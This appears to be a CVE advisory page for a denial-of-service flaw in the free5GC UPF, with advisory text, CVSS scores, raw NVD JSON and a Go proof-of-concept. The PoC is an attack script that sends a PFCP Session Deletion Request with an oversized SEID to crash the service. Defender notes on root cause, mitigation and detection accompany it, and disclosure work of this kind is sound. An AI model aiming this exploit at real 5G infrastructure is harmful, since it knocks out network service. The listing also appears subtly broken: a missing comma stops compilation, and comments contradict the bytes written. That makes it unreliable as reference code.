Security Vulnerability Report
CVE-2025-65562 CVSS 7.5 HIGH

CVE-2025-65562

Published: 2025-12-18 19:16:34
Last Modified: 2026-01-07 21:01:21

Description

The free5GC UPF suffers from a lack of bounds checking on the SEID when processing PFCP Session Deletion Requests. An unauthenticated remote attacker can send a request with a very large SEID (e.g., 0xFFFFFFFFFFFFFFFF) that causes an integer conversion/underflow in LocalNode.DeleteSess() / LocalNode.Sess() when a uint64 SEID is converted to int and used in index arithmetic. This leads to a negative index into n.sess and a Go runtime panic, resulting in a denial of service (UPF crash). The issue has been reproduced on free5GC v4.1.0 with crashes observed in the session lookup/deletion path in internal/pfcp/node.go; other versions may also be affected. No authentication is required.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:free5gc:free5gc:4.1.0:*:*:*:*:*:*:* - VULNERABLE
free5GC < 4.1.0
free5GC UPF v4.1.0 (confirmed affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
// CVE-2025-65562 PoC - free5GC UPF SEID Integer Underflow
// This PoC sends a PFCP Session Deletion Request with a malicious large SEID
//
// Defender notes:
//   - Root cause, per the advisory text on this page: the UPF converts the
//     uint64 SEID taken from the PFCP header to int and uses it in index
//     arithmetic on n.sess without a bounds check, so an out-of-range SEID
//     becomes a negative index and the Go runtime panics (CWE-129).
//   - Mitigation: range-check the SEID before any conversion or indexing in
//     LocalNode.Sess() / LocalNode.DeleteSess() and answer with an error for
//     unknown sessions; independently, filter the PFCP (N4) UDP port so that
//     only the expected SMF peers can reach it.
//   - Detection: a PFCP session message from an unexpected peer, or one whose
//     SEID matches no established session, followed by a UPF restart and an
//     "index out of range" panic whose stack passes through
//     internal/pfcp/node.go.
//
// NOTE(review): the listing is kept exactly as published. It has not been
// verified to build or to reproduce the crash; the upstream issue referenced by
// the CVE record is the authoritative description.
package main

import (
	"encoding/binary"
	"fmt"
	"net"
)

// PFCP Header Structure
//
// PFCPHeader names the header fields the author models. The type is declared
// but never referenced by the functions below, which write raw bytes instead.
type PFCPHeader struct {
	Version        uint8
	Flag           uint8
	MessageType    uint8
	MessageLength  uint16
	SequenceNumber uint32
	Seid           uint64
}

// createPFCPHeader returns a 16-byte buffer laid out as this listing defines
// it: byte 0 is the constant 0x20, byte 1 is msgType, bytes 2-3 are a zeroed
// length placeholder, bytes 4-7 hold seqNum and bytes 8-15 hold seid, both
// big-endian. The caller is expected to fill in the length afterwards.
func createPFCPHeader(msgType uint8, seid uint64, seqNum uint32) []byte {
	header := make([]byte, 16)
	// Version (3 bits) + Flags (5 bits)
	header[0] = 0x20 // Version 1
	header[1] = msgType
	// Message Length (will be set later)
	binary.BigEndian.PutUint16(header[2:4], 0x0000)
	// Sequence Number (3 bytes)
	binary.BigEndian.PutUint32(header[4:8], seqNum)
	// SEID
	// The attacker-controlled value lands here unmodified; this is the field
	// the receiving side must validate before converting it to int.
	binary.BigEndian.PutUint64(header[8:16], seid)
	return header
}

// createSessionDeletionRequest builds the message the author describes as a
// PFCP Session Deletion Request: a header from createPFCPHeader (message type
// 0x1D, sequence number 1, the given seid) followed by a 9-byte information
// element, with bytes 2-3 then overwritten with the total length minus 4.
func createSessionDeletionRequest(seid uint64) []byte {
	// Create PFCP Session Deletion Request header
	header := createPFCPHeader(0x1D, seid, 0x000001)
	// Add IE (Information Element) - Cause
	ie := []byte{
		0x00, 0x02, // IE Type: Cause
		0x00, 0x05, // IE Length
		0x00, // Spare
		0x10, // Cause: Delete (request to delete session)
		0x00, 0x00, 0x00 // Spare
	}
	message := append(header, ie...)
	// Update message length
	binary.BigEndian.PutUint16(message[2:4], uint16(len(message)-4))
	return message
}

// main prints a banner, builds one message carrying the all-ones SEID and
// writes it in a single UDP datagram to the hard-coded loopback address on
// port 8805. No reply is read; every outcome is only reported on stdout.
func main() {
	fmt.Println("CVE-2025-65562 PoC - free5GC UPF SEID Integer Underflow")
	fmt.Println("Target: free5GC UPF PFCP endpoint (usually port 8805)")
	// Malicious SEID that causes integer underflow
	// 0xFFFFFFFFFFFFFFFF will be converted to -1 when cast to int
	// (Go wraps a non-constant uint64 -> int conversion instead of failing,
	// which is why the receiving code needs an explicit range check.)
	maliciousSeid := uint64(0xFFFFFFFFFFFFFFFF)
	fmt.Printf("Using malicious SEID: 0x%016X\n", maliciousSeid)
	fmt.Printf("This SEID will underflow to index: %d\n", int(maliciousSeid))
	// Create the malicious packet
	packet := createSessionDeletionRequest(maliciousSeid)
	fmt.Printf("Sending %d bytes to target...\n", len(packet))
	// Open the UDP socket. As published the destination is the loopback
	// address, i.e. a UPF instance running on the same lab host.
	conn, err := net.DialUDP("udp", nil, &net.UDPAddr{
		IP:   net.ParseIP("127.0.0.1"),
		Port: 8805,
	})
	if err != nil {
		fmt.Printf("Connection error: %v\n", err)
		return
	}
	defer conn.Close()
	// Send the malicious packet
	// UDP is connectionless: a successful Write only means the datagram left
	// this host, not that the UPF received or processed it.
	_, err = conn.Write(packet)
	if err != nil {
		fmt.Printf("Send error: %v\n", err)
		return
	}
	fmt.Println("Malicious packet sent successfully!")
	fmt.Println("Expected result: UPF panic and crash due to negative array index")
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65562", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:33.747", "lastModified": "2026-01-07T21:01:21.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The free5GC UPF suffers from a lack of bounds checking on the SEID when processing PFCP Session Deletion Requests. An unauthenticated remote attacker can send a request with a very large SEID (e.g., 0xFFFFFFFFFFFFFFFF) that causes an integer conversion/underflow in LocalNode.DeleteSess() / LocalNode.Sess() when a uint64 SEID is converted to int and used in index arithmetic. This leads to a negative index into n.sess and a Go runtime panic, resulting in a denial of service (UPF crash). The issue has been reproduced on free5GC v4.1.0 with crashes observed in the session lookup/deletion path in internal/pfcp/node.go; other versions may also be affected. No authentication is required."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:free5gc:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4087E419-65F0-4AAD-A2F6-C24EEDC27B3B"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/issues/731", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": 
"https://github.com/free5gc/free5gc/issues/731", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}